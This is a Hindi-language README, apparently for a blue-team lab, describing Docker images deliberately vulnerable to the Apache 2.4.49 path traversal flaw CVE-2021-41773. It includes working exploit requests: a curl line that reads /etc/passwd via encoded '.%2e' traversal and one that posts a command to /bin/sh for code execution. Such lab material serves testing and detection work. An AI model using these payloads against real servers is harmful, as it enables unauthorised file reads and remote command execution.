
CVE-2021-41773 के लिए कमजोर डॉकर इमेज
यह कमजोरी केवल संस्करण 2.4.49 पर लागू होती है जिसमें विशिष्ट गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन हैं। कुछ स्थितियों में यह फ़ाइल रीड या कोड एक्जीक्यूशन का परिणाम हो सकता है।
https://twitter.com/ptswarm/status/1445376079548624899
कंटेनरों को सीधे Docker Hub से निम्न का उपयोग करके पुल किया जा सकता है
docker pull blueteamsteve/cve-2021-41773:no-cgid
और निम्न का उपयोग करके निष्पादित किया जा सकता है
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Apache लॉग को नीचे दिए गए का उपयोग करके देखा जा सकता है, या stdio को स्ट्रीम करने के लिए ऊपर दिए गए रन कमांड से "-dit" को हटा दें।
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
कंटेनरों को सीधे Docker Hub से निम्न का उपयोग करके पुल किया जा सकता है
docker pull blueteamsteve/cve-2021-41773:with-cgid
और निम्न का उपयोग करके निष्पादित किया जा सकता है
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Apache लॉग को नीचे दिए गए का उपयोग करके देखा जा सकता है, या stdio को स्ट्रीम करने के लिए ऊपर दिए गए रन कमांड से "-dit" को हटा दें।
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
उप-निर्देशिकाओं में dockerfile और टेम्पलेट httpd.conf फ़ाइलों का उपयोग करके अपने स्वयं के संस्करणों को संशोधित और बनाएं।